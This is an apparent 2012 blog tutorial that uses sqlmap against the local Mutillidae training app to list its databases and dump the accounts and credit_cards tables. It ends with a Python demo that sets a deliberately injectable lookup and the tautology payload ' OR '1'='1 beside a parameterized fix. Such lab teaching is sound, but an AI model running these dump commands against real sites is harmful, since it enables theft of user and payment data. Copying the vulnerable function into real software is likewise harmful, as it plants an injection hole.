Wednesday, May 2, 2012

Dumping a MySQL DB - sqlmap 101

sqlmap is one of the most commonly used tools for web application penetration testing: it is open source and automates SQL injection attacks, and it can also spawn a shell on the target. It fully supports the MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB database management systems. It is written in Python.

To see all the options and switches this tool supports, type sqlmap -h in your terminal.

Suppose we have already found a link that is vulnerable to SQL injection. We pass the target URL with -u and append --dbs to enumerate the databases:

$ sqlmap -u 'http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' --dbs

After that we should see the back-end DBMS, the web server and, most importantly, the databases:


Databases enumerated:
[*] dvwa
[*] information_schema
[*] mysql
[*] owasp10

Now let's list all the tables in the owasp10 database, which is the database of the Mutillidae web application:

$ sqlmap -u 'http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' -D owasp10 --tables


Tables enumerated:
+----------------+
| accounts       |
| blogs_table    |
| captured_data  |
| credit_cards   |
| hitlog         |
| pen_test_tools |
+----------------+


Now let's dump all the columns of the accounts table:

$ sqlmap -u 'http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' -D owasp10 -T accounts --dump


Right, we got the columns cid, mysignature, password and username =)

Similar query: SELECT * FROM accounts;

Now let's try dumping the credit_cards table:

$ sqlmap -u 'http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' -D owasp10 -T credit_cards --dump

Similar query: SELECT * FROM credit_cards;

Well, that should be it! I hope this has shown you how to use sqlmap to dump the tables of a given database.
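To make clear what sqlmap is exploiting on the user-info page, here is an added example (not part of the original post or of Mutillidae's code): a constructed stand-in for the owasp10.accounts table, using sqlite3 in place of MySQL with made-up rows, showing the kind of string-concatenated lookup that makes the username and password parameters injectable beside the parameterized query that fixes it.

```python
import sqlite3

# Constructed stand-in for owasp10.accounts (same column names as the dump above;
# sqlite3 is used here instead of MySQL so the example runs offline).
SCHEMA = """
CREATE TABLE accounts (
    cid INTEGER PRIMARY KEY,
    username TEXT,
    password TEXT,
    mysignature TEXT
);
"""
# Constructed sample rows, not the real Mutillidae data.
SAMPLE_ROWS = [
    (1, "admin", "adminpass", "constructed signature 1"),
    (2, "alice", "alicepass", "constructed signature 2"),
    (3, "bob", "bobpass", "constructed signature 3"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, username, password):
    # Request parameters are pasted straight into the SQL text, so quotes and
    # keywords in them become SQL syntax. This is what lets sqlmap enumerate
    # databases and dump tables through the username parameter.
    sql = ("SELECT cid, username FROM accounts WHERE username = '%s' "
           "AND password = '%s'" % (username, password))
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, username, password):
    # Parameterized query: the driver binds the values as data, so the same
    # input is compared literally against the column and never parsed as SQL.
    sql = "SELECT cid, username FROM accounts WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


if __name__ == "__main__":
    db = make_db()
    tautology = "' OR '1'='1"
    print("vulnerable:", lookup_vulnerable(db, tautology, tautology))  # all 3 rows
    print("hardened:  ", lookup_hardened(db, tautology, tautology))    # []
```

Against the vulnerable function the tautology input returns every account, which is the behaviour sqlmap detects and then automates; against the hardened one it matches nothing because no user is literally named that.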
